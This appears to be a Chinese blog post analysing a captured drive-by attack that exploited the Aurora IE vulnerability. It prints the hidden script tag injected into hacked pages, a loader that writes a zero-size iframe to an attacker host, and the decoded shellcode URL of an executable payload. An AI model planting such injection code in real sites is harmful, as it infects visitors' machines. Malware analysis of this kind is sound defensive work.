极光(CVE-2010-0249)IE 0day漏洞 Shellcode

极光IE 0day漏洞出来好多天了，各种杀毒软件公司极力宣传极光(CVE-2010-0249)IE 0day漏洞多么可怕，什么一打开网页就中招，什么被入侵电脑的游戏帐号可能被盗，银行帐号多么危险。我看这就是一个噱头，无非是骗骗菜鸟在电脑上安装个只占内存不杀毒的垃圾软件，自己的网站服务器都被挂马，还能指望它杀毒？！

在网络媒体报道极光漏洞第二天网上就有极光的Shellcode流出，我从一个被挂马的网站上也抓回一个，在自己机器上测试确实像传说中的一样“不弹，不卡”，就像当年的MS06014。但我在测试过程中发现我抓到的极光的Shellcode只有在IE6下才有效，跟网上报道的有很大出入，在没打补丁的IE7下测试都不能正常执行。

这几天也在关注什么网站被挂马，好第一时间抓个回来，希望能抓到那个被利用攻击谷歌的shellcode。之前公布的极光IE 0day(CVE-2010-0249) 就是针对IE6的。给大家分析一下这马到底是怎么挂到网站上去的。

首先是要入侵网站拿到网站的webshell

拿到网站的额webshell后，就可以直接编辑网站的页面。

在网页上插入挂马代码

我抓到的挂马代码写的特别巧妙，很值得借鉴呢，看下面代码，模仿的谷歌广告代码调用的脚本地址，而且是调用的图片，如果不仔细看是看不出来的。只要在网页上插入这么一段代码，马挂上了。

<script type="text/javascript" src="http://pagead2.googlesyndication.xx.xx/pagead/logo.gif"></script>

这个图片地址空间是挂马者自己的租用的空间，域名模仿了一些知名网络服务的域名，目的就是让人不易察觉。下面看看这个logo.gif到底是什么东西。

下载回来用写字板打开这个图片文件(其实写字板能打开的文件类型很多哦)内如如下：

function Get(){
function Get(){
var Then = new Date() 
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1=" 
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){ 
} else 
{ 
document.cookie = "Cookie1=risb;expires="+ Then.toGMTString()
document.writeln("<iframe src="http://pagead2.googlesyndication.xx.xx/pagead/aurora.htm" height="0" width="0"></iframe>");
}
}Get();

挂马者考虑的还很全面居然写了cookies防止重复中马。其中iframe调用的就是极光的shellcode了。

我在这段代码中加了一行防止杀毒软件“误杀” Shellcode最终下载并运行的东西存在var u=swyice里面，十六进制转换加密的。用UE就能查看原来的内容内容%u7468%u7074 ->74 68 70 74 ->thpt ->http 看到这儿就能看出Shellcode执行的文件的地址是存在这里的，全部解开后就是：

http://pagead2.googlesyndication.xx.xx/pagead/1.exe

这个1.exe就是最终要在电脑中运行的文件。

后记：
1.极光(CVE-2010-0249)IE 0day漏洞 Shellcode 解密工具
2.IE漏洞实在太多，建议换FireFox浏览器或者其他非IE核心的浏览器。
3.杀毒软件不是万能的，别以为装个杀毒软件就什么网站都上。